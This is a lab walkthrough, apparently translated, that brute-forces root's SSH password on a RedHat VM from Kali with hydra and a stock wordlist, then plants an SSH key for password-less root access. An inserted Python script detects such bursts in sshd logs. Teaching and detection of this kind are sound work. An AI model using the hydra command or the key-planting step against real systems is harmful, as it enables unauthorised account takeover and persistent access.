Brute-Forcing the SSH Service on Linux
I. SSH password cracking
1. Check the RedHat Linux version information
[root@ping ~]# cat /proc/version
Linux version 2.6.32-573.el6.x86_64 (mockbuild@x86-027.build.eng.bos.redhat.com) (gcc version 4.4.7 20120313 (Red Hat 4.4.7-16) (GCC) ) #1 SMP Wed Jul 1 18:23:37 EDT 2015
2. Check the Kali Linux version information
root@kali:~# cat /proc/version
Linux version 4.9.0-kali4-amd64 (devel@kali.org) (gcc version 6.3.0 20170415 (Debian 6.3.0-14) ) #1 SMP Debian 4.9.25-1kali1 (2017-05-04)
3. Check the IP address of the RedHat Linux network interface
[root@ping ~]# ifconfig eth0
eth0 Link encap:Ethernet HWaddr 52:54:00:1C:25:4A
inet addr:192.168.100.5 Bcast:192.168.100.255 Mask:255.255.255.0
inet6 addr: fe80::5054:ff:fe1c:254a/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:217 errors:0 dropped:0 overruns:0 frame:0
TX packets:76 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:17149 (16.7 KiB) TX bytes:9661 (9.4 KiB)
4. Check the IP address of the Kali Linux network interface
root@kali:~# ifconfig virbr1
virbr1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.100.1 netmask 255.255.255.0 broadcast 192.168.100.255
ether 52:54:00:4a:8c:c8 txqueuelen 1000 (Ethernet)
RX packets 79 bytes 9385 (9.1 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 102 bytes 10949 (10.6 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
5. Check whether Kali can connect to the SSH service on RedHat Linux
root@kali:~# telnet 192.168.100.5 22
Trying 192.168.100.5...
Connected to 192.168.100.5.
Escape character is '^]'.
SSH-2.0-OpenSSH_5.3
6. Check whether port 22 on RedHat Linux is open
root@kali:~# nmap -p 22 192.168.100.5
Starting Nmap 7.40 ( https://nmap.org ) at 2018-03-13 20:15 UTC
Nmap scan report for www.ping.cn (192.168.100.5)
Host is up (0.00025s latency).
PORT STATE SERVICE
22/tcp open ssh
MAC Address: 52:54:00:1C:25:4A (QEMU virtual NIC)
7. Kali ships with default wordlists for brute forcing
root@kali:~# cat /usr/share/wordlists/metasploit/unix_passwords.txt | wc -l
1008
8. Run hydra, specifying the user name root, the wordlist, and the ssh service
root@kali:~# hydra -l root -P /usr/share/wordlists/metasploit/unix_passwords.txt ssh://192.168.100.5
Hydra v8.3 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2018-03-13 20:26:11
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 64 tasks, 1008 login tries (l:1/p:1008), ~0 tries per task
[DATA] attacking service ssh on port 22
[22][ssh] host: 192.168.100.5 login: root password: 123456
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2018-03-13 20:26:14
9. Log in to RedHat Linux and check the security log
root@kali:~/.ssh# ssh root@192.168.100.5
[root@ping ~]# cat /var/log/secure | grep "Failed password" | wc -l
21
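The grep count above only shows that failures occurred. The following Python is an added example, not part of the original post: it groups sshd password results by source address, flags a burst of failures inside a time window, and reports any account that was logged into while the burst was active. The log lines are constructed in the format sshd writes to /var/log/secure; the threshold, the window, the PIDs and ports, and the second user (alice, 192.168.100.20) are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Password-auth results as sshd writes them to /var/log/secure.
LINE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\S+) port \d+")

def detect_bruteforce(lines, threshold=5, window=timedelta(seconds=60), year=2018):
    """Flag source IPs with >= threshold failed passwords inside `window`,
    and list accounts that were logged into while such a burst was active."""
    recent = defaultdict(deque)   # ip -> timestamps of recent failures
    report = {}                   # ip -> {"peak_failures": n, "guessed": [users]}
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue              # not a password-auth result line
        # syslog timestamps carry no year, so the caller supplies it
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        q = recent[m["ip"]]
        while q and ts - q[0] > window:
            q.popleft()           # drop failures that fell out of the window
        if m["result"] == "Failed":
            q.append(ts)
            if len(q) >= threshold:
                entry = report.setdefault(m["ip"], {"peak_failures": 0, "guessed": []})
                entry["peak_failures"] = max(entry["peak_failures"], len(q))
        elif len(q) >= threshold:
            # success during an active burst: treat the password as guessed
            report[m["ip"]]["guessed"].append(m["user"])
    return report

# Constructed sample: 6 failures from one source, then a success, plus an
# unrelated user who mistypes once before logging in.
SAMPLE = [f"Mar 13 20:26:{11 + i // 3:02d} ping sshd[{2300 + i}]: Failed password "
          f"for root from 192.168.100.1 port {40000 + i} ssh2" for i in range(6)]
SAMPLE += [
    "Mar 13 20:26:14 ping sshd[2310]: Accepted password for root from 192.168.100.1 port 40010 ssh2",
    "Mar 13 20:30:01 ping sshd[2400]: Failed password for alice from 192.168.100.20 port 50000 ssh2",
    "Mar 13 20:30:09 ping sshd[2401]: Accepted password for alice from 192.168.100.20 port 50001 ssh2",
]

if __name__ == "__main__":
    for ip, info in detect_bruteforce(SAMPLE).items():
        print(ip, info)
```

On a real host, pass an open file handle for /var/log/secure as `lines`; a non-empty `guessed` list means the account's password should be rotated and the session investigated.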
II. Password-less SSH login
1. Generate the key pair (private and public key)
root@kali:~# ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa):
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /root/.ssh/id_rsa.
Your public key has been saved in /root/.ssh/id_rsa.pub.
The key fingerprint is:
SHA256:J3puYy3569PnEYHvygLvfSHTkcBZdnz63G/PsTsqYPU root@kali
The key's randomart image is:
+---[RSA 2048]----+
| . oo..|
| +o .o|
| ...o.|
| . .+. |
| S o ..o+.|
| ..= oEo.+|
| . o=.. ooo.|
| o* =+..o+=|
| o.*=+==o+*|
+----[SHA256]-----+
2. View the key files
root@kali:~# cd .ssh/
root@kali:~/.ssh# ls
id_rsa id_rsa.pub known_hosts
3. Copy the local host's public key into the user's home directory on the remote host; a hidden directory (.ssh) is created there
root@kali:~# ssh-copy-id root@192.168.100.5
/usr/bin/ssh-copy-id: INFO: attempting to log in with the new key(s), to filter out any that are already installed
/usr/bin/ssh-copy-id: INFO: 1 key(s) remain to be installed -- if you are prompted now it is to install the new keys
root@192.168.100.5's password:
4. Log in to the RedHat host with the ssh client
root@kali:~/.ssh# ssh root@192.168.100.5
Last login: Wed Mar 14 04:24:29 2018 from 192.168.100.1
[root@ping ~]# uname -m
x86_64
5. View the public key file
[root@ping .ssh]# ls
authorized_keys
